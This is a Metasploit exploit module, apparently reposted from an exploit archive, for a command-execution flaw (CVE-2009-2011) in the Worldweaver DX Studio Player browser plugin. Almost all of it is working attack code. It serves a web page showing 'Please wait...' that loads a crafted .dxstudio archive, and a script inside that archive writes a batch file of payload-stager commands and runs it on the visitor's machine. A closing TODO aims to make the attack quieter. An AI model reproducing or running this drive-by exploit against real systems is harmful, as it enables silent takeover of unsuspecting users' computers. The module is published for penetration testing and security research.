Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution

`##  
# $Id: dxstudio_player_exec.rb 8541 2010-02-17 20:14:40Z jduck $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
require 'rex/zip'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpServer::HTML  
include Msf::Exploit::CmdStager  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution',  
'Description' => %q{  
This module exploits a command execution vulnerability within the  
DX Studio Player from Worldweaver. The player is a browser plugin for  
IE (ActiveX) and Firefox (dll). When an unsuspecting user visits a web   
page referring to a specially crafted .dxstudio document, an attacker can  
execute arbitrary commands.  
  
Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20 and  
IE 6 on Windows XP SP3. In IE, the user will be prompted if they wish to allow  
the plug-in to access local files. This prompt appears to occur only once per   
server host.  
  
NOTE: This exploit uses additionally dangerous script features to write to  
local files!  
},  
'License' => MSF_LICENSE,  
'Author' => [ 'jduck' ],  
'Version' => '$Revision: 8541 $',  
'References' =>  
[  
[ 'CVE', '2009-2011' ],  
[ 'BID', '35273' ],  
[ 'OSVDB', '54969' ],  
[ 'URL', 'http://www.exploit-db.com/exploits/8922' ],  
[ 'URL', 'http://dxstudio.com/guide.aspx' ]  
],  
'Payload' =>  
{  
'Space' => 2048,  
},  
'Platform' => 'win',  
# 'Arch' => ARCH_CMD,  
'Targets' =>  
[  
[ 'Automatic', { } ],  
],  
'DisclosureDate' => 'Jun 09 2009',  
'DefaultTarget' => 0))  
end  
  
def on_request_uri(cli, request)  
  
url_base = "http://"  
url_base += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']  
url_base += ":" + datastore['SRVPORT'] + get_resource()  
  
payload_url = url_base + "/payload"  
  
# handle request for the payload  
if (request.uri.match(/payload/))  
  
# build the payload  
return if ((p = regenerate_payload(cli)) == nil)  
data = Msf::Util::EXE.to_win32pe(framework, p.encoded)  
  
cmds = generate_cmdstager({}, 2047, p)  
scr = ""  
cmds.each_line { |ln|  
ln.chomp!  
scr << " f.writeString('"  
scr << ln  
scr << "\\n');\n"  
}  
  
# make header.xml  
hdrxml = %Q|<?xml version="1.0"?>  
<dxstudio>  
<script><![CDATA[function onInit()  
{  
var f=system.file.openWrite("BATNAME");  
f.writeString('@echo off\\n');  
CMDS  
f.close();  
shell.execute("BATNAME");  
}]]>  
</script>  
</dxstudio>  
|  
hdrxml.gsub!(/CMDS/, scr);  
bat_name = rand_text_alphanumeric(rand(32)) + ".bat"  
hdrxml.gsub!(/BATNAME/, bat_name);  
  
# craft the zip archive  
zip = Rex::Zip::Archive.new  
zip.add_file("header.xml", hdrxml)  
data = zip.pack  
  
print_status("Sending file.dxstudio payload to #{cli.peerhost}:#{cli.peerport}...")  
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })  
  
# Handle the payload  
# handler(cli)  
return  
end  
  
# otherwise, send the html..  
html = %Q|<html>  
<body>  
<div height=100%>  
Please wait...  
</div>  
<object width=1 height=1 classid='clsid:0AC2706C-8623-46F8-9EDD-8F71A897FDAE'>  
<param name="src" value="DXURL" />  
<embed width=1 height=1 src=DXURL type="application/x-dxstudio">  
</embed>  
</object>  
</body>  
</html>  
|  
  
print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}...")  
# Transmit the compressed response to the client  
html.gsub!(/DXURL/, payload_url)  
send_response(cli, html, { 'Content-Type' => 'text/html' })  
  
end  
end  
  
=begin  
TODO:  
- make it more quiet  
- auto-migrate?  
=end  
`